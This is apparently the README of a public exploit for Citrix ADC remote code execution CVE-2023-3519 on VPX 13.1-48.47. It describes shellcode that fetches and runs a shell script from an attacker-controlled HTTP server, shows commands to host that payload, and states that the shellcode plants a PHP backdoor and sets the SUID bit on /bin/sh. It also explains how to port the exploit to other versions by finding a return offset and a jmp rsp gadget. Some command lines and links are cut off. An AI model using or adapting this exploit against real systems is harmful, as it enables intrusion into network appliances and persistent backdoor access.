# Citrix ADC RCE CVE-2023-3519
This exploit uses addresses and shellcode for Citrix VPX 13.1-48.47. For the full writeup, click [here](

### Usage
NASM is required to build the shellcode. 
$ sudo apt install nasm

The included shellcode will download and run a shell script from a remote http(s) server. The script takes 3 arguments: the target host, the target port, and the URL of a shell script payload. An example payload which runs `id` and `uname -a` before cleaning up after itself is included in this repo. 

$ echo 'id' > a
$ python3 -m http.server &
$ python3 443
The URL must be short enough to fit in the shellcode buffer, and you will get a warning if it is too long. 

### Shellcode artifacts
The shellcode will create a PHP backdoor in `/var/netscaler/logon/a.php` and set the SUID bit on `/bin/sh`. The included `sh` payload shows an example of automatically cleaning up these artifacts. Also note that the shellcode does not close its file descriptors, so excessive repeated exploitation may result in resource exhaustion. 

### Adapting to other versions
For FreeBSD-based Citrix targets, you should only need to find 3 values: the offset of the saved return pointer, a `jmp rsp` ROP gadget (or something equivalent, such as `push rsp; ret;`), and the address to jump to in order to avoid a crash. These parameters are all hardcoded near the top of ``.